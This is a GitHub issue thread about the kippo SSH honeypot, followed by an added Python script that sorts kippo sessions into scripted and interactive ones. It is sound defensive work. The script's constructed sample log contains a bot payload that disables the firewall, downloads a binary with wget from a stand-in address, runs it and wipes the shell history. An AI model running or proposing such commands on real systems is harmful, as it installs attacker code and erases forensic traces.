desaster / kippo

Kippo - SSH Honeypot

Just getting "bash: /etc/init.d/iptables: command not found" #162

Open sosdow opened 9 years ago

sosdow commented 9 years ago

Hi. Running kippo for a few weeks now, on different platforms (PI, Server, VBox), but just getting approx 40 hits a day doing the same thing. Playing the log gives:

```
pi@raspberrypi ~/kippo-master/utils $ python playlog.py ../log/tty/20141102-043357-1219.log
bash: /etc/init.d/iptables: command not found
pi@raspberrypi ~/kippo-master/utils $
```

The actual log is very long and is displayed below. Is this just bots hitting my honeypot, or is there a problem with my setup? Hitting it myself, remotely, it does exactly what I want. Any pointers appreciated. Thank you Seamus

katkad commented 9 years ago

Hello, I think this is related to this one: #157

= they are exec commands in quotes

sosdow commented 9 years ago

Hi. Thanks for the comment. Does this mean that attackers are launching the scripts listed above at my honeypot? There has been no 'normal, correct' human behavior on my honeypot.

katkad commented 9 years ago

I haven't seen a human on my kippo in a very long time.

micheloosterhof commented 9 years ago

Your honeypot is functioning fine.
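The thread's point is that the whole script arrived inside the quotes of a single SSH exec request rather than being typed into the shell, which is why playlog shows only the first chunk as "command not found". The triage script below is an added example (not part of kippo or of this thread): it reads records in the log format quoted in the issue, re-joins exec payloads that continue across several lines inside the quotes, and labels each session as scripted-exec, interactive, or auth-only, listing any fetched URLs. The log it runs on is constructed, using RFC 5737 documentation addresses.

```python
"""Triage kippo sessions: was the payload pushed in one SSH exec request
(scripted, bot-like) or typed interactively?  Example code, not kippo's."""
import re

# Constructed sample in kippo's log format (not from a real sensor; hosts
# use RFC 5737 documentation addresses).  Session 107 mirrors the issue:
# a multi-line script arrives inside the quotes of a single exec request.
SAMPLE_LOG = """\
2014-11-02 04:32:17+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 198.51.100.7:37038 (192.168.1.3:2222) [session: 107]
2014-11-02 04:32:35+0000 [HoneyPotTransport,107,198.51.100.7] Remote SSH version: SSH-2.0-PuTTY_Release_0.63cn
2014-11-02 04:33:53+0000 [SSHService ssh-userauth on HoneyPotTransport,107,198.51.100.7] login attempt [root/admin] succeeded
2014-11-02 04:33:57+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,107,198.51.100.7] exec command: "/etc/init.d/iptables stop
echo "nameserver 8.8.8.8" >> /etc/resolv.conf
cd /tmp;wget -c http://198.51.100.200:9162/jdhe
cd /tmp;chmod 7777 jdhe
cd /tmp;./jdhe
rm -rf /root/.bash_history"
2014-11-02 04:36:15+0000 [HoneyPotTransport,107,198.51.100.7] connection lost
2014-11-02 05:10:02+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 203.0.113.5:51022 (192.168.1.3:2222) [session: 108]
2014-11-02 05:10:03+0000 [HoneyPotTransport,108,203.0.113.5] Remote SSH version: SSH-2.0-libssh2_1.4.2
2014-11-02 05:10:09+0000 [SSHService ssh-userauth on HoneyPotTransport,108,203.0.113.5] login attempt [root/123456] failed
2014-11-02 05:10:10+0000 [HoneyPotTransport,108,203.0.113.5] connection lost
2014-11-02 06:01:40+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 192.0.2.44:40110 (192.168.1.3:2222) [session: 109]
2014-11-02 06:01:41+0000 [HoneyPotTransport,109,192.0.2.44] Remote SSH version: SSH-2.0-OpenSSH_6.7p1
2014-11-02 06:01:49+0000 [SSHService ssh-userauth on HoneyPotTransport,109,192.0.2.44] login attempt [root/admin] succeeded
2014-11-02 06:02:03+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,109,192.0.2.44] CMD: uname -a
2014-11-02 06:02:15+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,109,192.0.2.44] CMD: cat /proc/cpuinfo
2014-11-02 06:02:40+0000 [HoneyPotTransport,109,192.0.2.44] connection lost
"""

# One record = timestamp, [context], message (message may span lines).
RECORD_RE = re.compile(
    r'^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[+-]\d{4}) \[([^\]]*)\] (.*)$', re.S)
SESSION_RE = re.compile(r'HoneyPotTransport,(\d+),([\d.]+)')
NEW_CONN_RE = re.compile(r'New connection: ([\d.]+):\d+ .*\[session: (\d+)\]')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')


def split_records(text):
    """Re-join continuation lines: a line that does not start with a
    timestamp belongs to the previous record (multi-line exec payloads)."""
    records = []
    for line in text.splitlines():
        if RECORD_RE.match(line) or not records:
            records.append(line)
        else:
            records[-1] += "\n" + line
    return records


def unquote(s):
    """Drop the surrounding double quotes kippo puts around an exec payload."""
    s = s.strip()
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == '"' else s


def command_list(script):
    """Split an exec payload into its individual commands (newline or ';')."""
    return [c.strip() for c in re.split(r'[\n;]', script) if c.strip()]


def verdict(s):
    """Label a session from what was observed.  An exec request is checked
    first because kippo also echoes the same payload on a 'CMD:' line."""
    if s["exec"]:
        n = sum(len(command_list(e)) for e in s["exec"])
        return "scripted-exec: %d commands in %d exec request(s)" % (n, len(s["exec"]))
    if s["cmds"]:
        return "interactive: %d typed command(s)" % len(s["cmds"])
    if any(l.endswith("succeeded") for l in s["logins"]):
        return "login-only"
    return "auth-failure-only" if s["logins"] else "no-auth"


def triage(text):
    """Map session id -> summary dict (ip, client, logins, exec, cmds, urls, verdict)."""
    sessions = {}
    for rec in split_records(text):
        m = RECORD_RE.match(rec)
        if not m:
            continue
        ctx, msg = m.group(2), m.group(3)
        nc = NEW_CONN_RE.search(msg)
        if nc:
            sessions[nc.group(2)] = {"ip": nc.group(1), "client": None,
                                     "logins": [], "exec": [], "cmds": [], "urls": []}
            continue
        sm = SESSION_RE.search(ctx)
        if not sm or sm.group(1) not in sessions:
            continue
        s = sessions[sm.group(1)]
        if msg.startswith("Remote SSH version: "):
            s["client"] = msg[len("Remote SSH version: "):]
        elif msg.startswith("login attempt "):
            s["logins"].append(msg[len("login attempt "):])
        elif msg.startswith("exec command: "):
            s["exec"].append(unquote(msg[len("exec command: "):]))
        elif msg.startswith("CMD: "):
            s["cmds"].append(msg[len("CMD: "):])
        s["urls"].extend(URL_RE.findall(msg))
    for s in sessions.values():
        s["urls"] = list(dict.fromkeys(s["urls"]))  # dedupe, keep order
        s["verdict"] = verdict(s)
    return sessions


if __name__ == "__main__":
    for sid, s in triage(SAMPLE_LOG).items():
        print("session %s from %s (%s): %s" % (sid, s["ip"], s["client"], s["verdict"]))
        for url in s["urls"]:
            print("   fetched URL (IoC): %s" % url)
```

Pointing it at a real kippo.log instead of SAMPLE_LOG gives a per-session view of how many connections delivered a script in one exec request versus typing commands, which is the distinction the replies above draw.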